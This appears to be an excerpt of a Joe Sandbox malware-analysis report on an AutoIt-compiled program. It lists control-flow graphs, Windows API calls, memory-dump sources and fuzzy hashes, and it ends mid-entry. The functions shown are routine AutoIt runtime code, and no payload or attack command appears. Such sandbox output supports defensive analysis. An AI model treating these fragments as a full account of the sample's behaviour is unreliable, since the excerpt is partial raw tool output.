                                                                                                                                                                                                                                                                                            control_flow_graph 577 92370f-923724 578 923726-923729 577->578 579 923784-923786 577->579 580 92378a 578->580 581 92372b-923732 578->581 579->578 582 923788 579->582 586 963df4-963e1c call 922f92 call 93f23c 580->586 587 923790-923795 580->587 583 923804-92380c PostQuitMessage 581->583 584 923738-92373d 581->584 585 92376f-923777 DefWindowProcW 582->585 592 9237b8-9237ba 583->592 588 923743-923747 584->588 589 963e61-963e75 call 98c8f7 584->589 591 92377d-923783 585->591 622 963e21-963e28 586->622 593 923797-92379a 587->593 594 9237bc-9237e3 SetTimer RegisterWindowMessageW 587->594 595 92380e-923818 call 93fcad 588->595 596 92374d-923752 588->596 589->592 614 963e7b 589->614 592->591 600 9237a0-9237b3 KillTimer call 923907 call 9259ff 593->600 601 963d95-963d98 593->601 594->592 597 9237e5-9237f0 CreatePopupMenu 594->597 616 92381d 595->616 602 963e46-963e4d 596->602 603 923758-92375d 596->603 597->592 600->592 607 963dd0-963def MoveWindow 601->607 608 963d9a-963d9e 601->608 602->585 611 963e53-963e5c call 981423 602->611 612 9237f2-923802 call 92381f 603->612 613 923763-923769 603->613 607->592 617 963da0-963da3 608->617 618 963dbf-963dcb SetFocus 608->618 611->585 612->592 613->585 613->622 614->585 616->592 617->613 623 963da9-963dba call 922f92 617->623 618->592 622->585 627 963e2e-963e41 call 923907 call 92396b 622->627 623->592 627->585
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00923709,?,?), ref: 00923777
                                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,00923709,?,?), ref: 009237A3
                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009237C6
                                                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00923709,?,?), ref: 009237D1
                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 009237E5
                                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00923806
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                            • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                                            • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                                            • Opcode ID: faf74b3529b01a2c22f838a1e580072fcaa43d0275b9b0e93366916807ef053d
                                                                                                                                                                                                                                                                                            • Instruction ID: 2373913342115abcc2e2697aa8297417deec4f70a008be67e025f25cda97327c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: faf74b3529b01a2c22f838a1e580072fcaa43d0275b9b0e93366916807ef053d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 734128F1258265BBDF142B38AD99BB93BADE740710F00C225F501CA1A8DABD9F44E761

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 633 9590c5-9590d5 634 9590d7-9590ea call 94f636 call 94f649 633->634 635 9590ef-9590f1 633->635 649 959471 634->649 636 9590f7-9590fd 635->636 637 959459-959466 call 94f636 call 94f649 635->637 636->637 640 959103-95912e 636->640 654 95946c call 952b5c 637->654 640->637 644 959134-95913d 640->644 647 959157-959159 644->647 648 95913f-959152 call 94f636 call 94f649 644->648 652 959455-959457 647->652 653 95915f-959163 647->653 648->654 655 959474-959479 649->655 652->655 653->652 657 959169-95916d 653->657 654->649 657->648 660 95916f-959186 657->660 662 9591a3-9591ac 660->662 663 959188-95918b 660->663 666 9591ae-9591c5 call 94f636 call 94f649 call 952b5c 662->666 667 9591ca-9591d4 662->667 664 959195-95919e 663->664 665 95918d-959193 663->665 668 95923f-959259 664->668 665->664 665->666 698 95938c 666->698 670 9591d6-9591d8 667->670 671 9591db-9591dc call 953b93 667->671 673 95932d-959336 call 95fc1b 668->673 674 95925f-95926f 668->674 670->671 679 9591e1-9591f9 call 952d38 * 2 671->679 686 9593a9 673->686 687 959338-95934a 673->687 674->673 678 959275-959277 674->678 678->673 682 95927d-9592a3 678->682 702 959216-95923c call 9597a4 679->702 703 9591fb-959211 call 94f649 call 94f636 679->703 682->673 688 9592a9-9592bc 682->688 691 9593ad-9593c5 ReadFile 686->691 687->686 693 95934c-95935b GetConsoleMode 687->693 688->673 689 9592be-9592c0 688->689 689->673 694 9592c2-9592ed 689->694 696 9593c7-9593cd 691->696 697 959421-95942c GetLastError 691->697 693->686 699 95935d-959361 693->699 694->673 701 9592ef-959302 694->701 696->697 706 9593cf 696->706 704 959445-959448 697->704 705 95942e-959440 call 94f649 call 94f636 697->705 700 95938f-959399 call 952d38 698->700 699->691 707 959363-95937d ReadConsoleW 699->707 700->655 701->673 709 959304-959306 701->709 702->668 703->698 716 959385-95938b call 94f613 704->716 717 95944e-959450 704->717 705->698 713 9593d2-9593e4 706->713 714 95937f GetLastError 707->714 715 95939e-9593a7 707->715 709->673 719 959308-959328 709->719 713->700 723 9593e6-9593ea 713->723 714->716 715->713 716->698 717->700 719->673 727 959403-95940e 723->727 728 9593ec-9593fc call 958de1 723->728 730 959410 call 958f31 727->730 731 95941a-95941f call 958c21 727->731 740 9593ff-959401 728->740 738 959415-959418 730->738 731->738 738->740 740->700
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 526f8002751e9380f0ab5990e72192b8b1b725f77964e4eb187199c3bfde7ce1
                                                                                                                                                                                                                                                                                            • Instruction ID: 5f50e3320fdfa0c4271e499115cf14eccebb367b78329966f37ae2c0badd14f2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 526f8002751e9380f0ab5990e72192b8b1b725f77964e4eb187199c3bfde7ce1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FDC10570908249EFEF11DFAAD841BADBBB4AF49311F144159EC14AB3E2C7349D4ACB60

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 741 93ac3e-93b063 call 928ec0 call 93bc58 call 92e6a0 748 978584-978591 741->748 749 93b069-93b073 741->749 752 978596-9785a5 748->752 753 978593 748->753 750 93b079-93b07e 749->750 751 97896b-978979 749->751 756 9785b2-9785b4 750->756 757 93b084-93b090 call 93b5b6 750->757 754 97897e 751->754 755 97897b 751->755 758 9785a7 752->758 759 9785aa 752->759 753->752 760 978985-97898e 754->760 755->754 764 9785bd 756->764 757->764 766 93b096-93b0a3 call 92c98d 757->766 758->759 759->756 762 978993 760->762 763 978990 760->763 768 97899c-9789eb call 92e6a0 call 93bbbe * 2 762->768 763->762 767 9785c7 764->767 774 93b0ab-93b0b4 766->774 772 9785cf-9785d2 767->772 806 93b1e0-93b1f5 768->806 807 9789f1-978a03 call 93b5b6 768->807 775 93b158-93b16f 772->775 776 9785d8-978600 call 944cd3 call 927ad5 772->776 778 93b0b8-93b0d6 call 944d98 774->778 781 978954-978957 775->781 782 93b175 775->782 819 978602-978606 776->819 820 97862d-978651 call 927b1a call 92bd98 776->820 791 93b0e5 778->791 792 93b0d8-93b0e1 778->792 787 978a41-978a79 call 92e6a0 call 93bbbe 781->787 788 97895d-978960 781->788 789 9788ff-978920 call 92e6a0 782->789 790 93b17b-93b17e 782->790 787->806 848 978a7f-978a91 call 93b5b6 787->848 788->768 797 978962-978965 788->797 789->806 812 978926-978938 call 93b5b6 789->812 798 93b184-93b187 790->798 799 978729-978743 call 93bbbe 790->799 791->767 802 93b0eb-93b0fc 791->802 792->778 800 93b0e3 792->800 797->751 797->806 808 9786ca-9786e0 call 926c03 798->808 809 93b18d-93b190 798->809 828 97888f-9788b5 call 92e6a0 799->828 829 978749-97874c 799->829 800->802 802->751 813 93b102-93b11c 802->813 814 93b1fb-93b20b call 92e6a0 806->814 815 978ac9-978acf 806->815 839 978a05-978a0d 807->839 840 978a2f-978a3c call 92c98d 807->840 808->806 837 9786e6-9786fc call 93b5b6 808->837 810 978656-978659 809->810 811 93b196-93b1b8 call 92e6a0 809->811 810->751 826 97865f-978674 call 926c03 810->826 811->806 856 93b1ba-93b1cc call 93b5b6 811->856 859 978945 812->859 860 97893a-978943 call 92c98d 812->860 813->772 825 93b122-93b154 call 93bbbe call 92e6a0 813->825 815->774 831 978ad5 815->831 819->820 833 978608-97862b call 92ad40 819->833 820->810 825->775 826->806 879 97867a-978690 call 93b5b6 826->879 828->806 866 9788bb-9788cd call 93b5b6 828->866 846 9787bf-9787de call 92e6a0 829->846 847 97874e-978751 829->847 831->751 833->819 833->820 886 9786fe-97870b call 928ec0 837->886 887 97870d-978716 call 928ec0 837->887 854 978a0f-978a13 839->854 855 978a1e-978a29 call 92b4b1 839->855 893 978ac2-978ac4 840->893 846->806 885 9787e4-9787f6 call 93b5b6 846->885 862 978757-978774 call 92e6a0 847->862 863 978ada-978ae8 847->863 881 978ab5-978abe call 92c98d 848->881 882 978a93-978a9b 848->882 854->855 872 978a15-978a19 854->872 855->840 905 978b0b-978b19 855->905 906 93b1d2-93b1de 856->906 907 9786ba-9786c3 call 92c98d 856->907 878 978949-97894f 859->878 860->878 862->806 897 97877a-97878c call 93b5b6 862->897 870 978aed-978afd 863->870 871 978aea 863->871 911 9788cf-9788dc call 92c98d 866->911 912 9788de 866->912 888 978b02-978b06 870->888 889 978aff 870->889 871->870 890 978aa1-978aa3 872->890 878->806 920 978692-97869b call 92c98d 879->920 921 97869d-9786ab call 928ec0 879->921 881->893 898 978a9d 882->898 899 978aa8-978ab3 call 92b4b1 882->899 885->806 928 9787fc-978805 call 93b5b6 885->928 929 978719-978724 call 928577 886->929 887->929 888->814 889->888 890->806 893->806 932 97879f 897->932 933 97878e-97879d call 92c98d 897->933 898->890 899->881 899->905 917 978b1e-978b21 905->917 918 978b1b 905->918 906->806 907->808 927 9788e2-9788e9 911->927 912->927 917->760 918->917 940 9786ae-9786b5 920->940 921->940 936 9788f5 call 923907 927->936 937 9788eb-9788f0 call 92396b 927->937 951 978807-978816 call 92c98d 928->951 952 978818 928->952 929->806 942 9787a3-9787ae call 949334 932->942 933->942 950 9788fa 936->950 937->806 940->806 942->751 956 9787b4-9787ba 942->956 950->806 955 97881c-97883f 951->955 952->955 958 978841-978848 955->958 959 97884d-978850 955->959 956->806 958->959 960 978852-97885b 959->960 961 978860-978863 959->961 960->961 962 978865-97886e 961->962 963 978873-978876 961->963 962->963 963->806 964 97887c-97888a 963->964 964->806
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                                            • API String ID: 0-4285391669
                                                                                                                                                                                                                                                                                            • Opcode ID: d05f2cc9e1549fb9fa8d2cd421e401bfce92dc82c7bf48f61c15680a84bd7d2e
                                                                                                                                                                                                                                                                                            • Instruction ID: b3c04439e7b51692761f9ae5ec448ba5073dee0dc7db7ad3b8f40b336042aadb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d05f2cc9e1549fb9fa8d2cd421e401bfce92dc82c7bf48f61c15680a84bd7d2e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B6246756093418FC728DF24C198AAABBE4FFC8314F10896EE5998B351DB70E945CF82

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 1001 9235b3-923623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009235E1
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00923602
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00923368,?), ref: 00923616
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00923368,?), ref: 0092361F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                            • Opcode ID: 802768024baf9f3fb801834d29d39fe78ef2061892f4145aaa23c65ea06f9ed0
                                                                                                                                                                                                                                                                                            • Instruction ID: 7ab05b6e9bd87c14a66e436813611f9821aca8480e1b6487a26080b41e33dea4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 802768024baf9f3fb801834d29d39fe78ef2061892f4145aaa23c65ea06f9ed0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CEF05EB16292957AE7310B136C49FB73EBDD7C7F20F00002EB904A7160D6A90851FAB0

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00965287
                                                                                                                                                                                                                                                                                              • Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A
                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00926299
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                                            • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                                            • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                                            • Opcode ID: 5e4b2511c6f53b8105edce82847658c41b0f0a8f1638f1764357f0a0bc612a9c
                                                                                                                                                                                                                                                                                            • Instruction ID: 9ca024cd57e4eeef23c50d25ae87f37d9bb2fc4fc0eb5cdc6f42d480465580aa
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e4b2511c6f53b8105edce82847658c41b0f0a8f1638f1764357f0a0bc612a9c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB41B371408324AAC311EB60EC45FEF7BDCAF84720F004A2EF599921A5EF749A49C792

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 1053 9258cb-9258d6 1054 925948-92594a 1053->1054 1055 9258d8-9258dd 1053->1055 1057 92593b-92593e 1054->1057 1055->1054 1056 9258df-9258f7 RegOpenKeyExW 1055->1056 1056->1054 1058 9258f9-925918 RegQueryValueExW 1056->1058 1059 92591a-925925 1058->1059 1060 92592f-92593a RegCloseKey 1058->1060 1061 925927-925929 1059->1061 1062 92593f-925946 1059->1062 1060->1057 1063 92592d 1061->1063 1062->1063 1063->1060
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,009258BE,SwapMouseButtons,00000004,?), ref: 009258EF
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,009258BE,SwapMouseButtons,00000004,?), ref: 00925910
                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,009258BE,SwapMouseButtons,00000004,?), ref: 00925932
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                            • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                            • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                                            • Opcode ID: baabe38ecc72645fbf3bd73c71d8813f96752e4e68443eb94e3840a244c48e0e
                                                                                                                                                                                                                                                                                            • Instruction ID: 487011b2eb3fbdcd5c993e9eac4146122882cff3801ce4615796d36961115997
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: baabe38ecc72645fbf3bd73c71d8813f96752e4e68443eb94e3840a244c48e0e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04117C79511628FFDB219F64EC80EAE77BCEF01760F514529F801E7214E2319E85EB60
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • Variable must be of type 'Object'., xrefs: 009748C6
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                                            • API String ID: 0-109567571
                                                                                                                                                                                                                                                                                            • Opcode ID: 46a54cc848c371094a178e64d60bd7e606c9d89ee461c694a0a762c6d010d865
                                                                                                                                                                                                                                                                                            • Instruction ID: 7465862464ca7755740920f976c91a9328df328c836d5840ced5ca0c2ab096cc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46a54cc848c371094a178e64d60bd7e606c9d89ee461c694a0a762c6d010d865
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EC29C71A00225CFCB24CF58D8A0BADB7B5BF88310F248579E94AAB395D375AD41CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 009315F2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8dfd1e46d5c3926b2eb3ad3de534c62f71aa353f570e0689e3a06ed33d9223a5
                                                                                                                                                                                                                                                                                            • Instruction ID: 095b4902ebce199ab0099f48a73e3cc81a18e08d7b121d415d32895034f25396
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dfd1e46d5c3926b2eb3ad3de534c62f71aa353f570e0689e3a06ed33d9223a5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ACB27675A08301CFCB24CF18C490A2AB7E5BBD9304F24895DE99A8B3A1D775ED45CF92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 009409D8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00943614: RaiseException.KERNEL32(?,?,?,009409FA,?,00000000,?,?,?,?,?,?,009409FA,00000000,009E9758,00000000), ref: 00943674
                                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 009409F5
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                            • String ID: Unknown exception
                                                                                                                                                                                                                                                                                            • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                            • Opcode ID: ba87b9533f33c34f017aab4efa5fa80cd89850cc40d9b5e44be064a04e06d0e5
                                                                                                                                                                                                                                                                                            • Instruction ID: cbaac301345261f8b906f294e0cd73bbd23e17f55613c4f695b0433c15886ff5
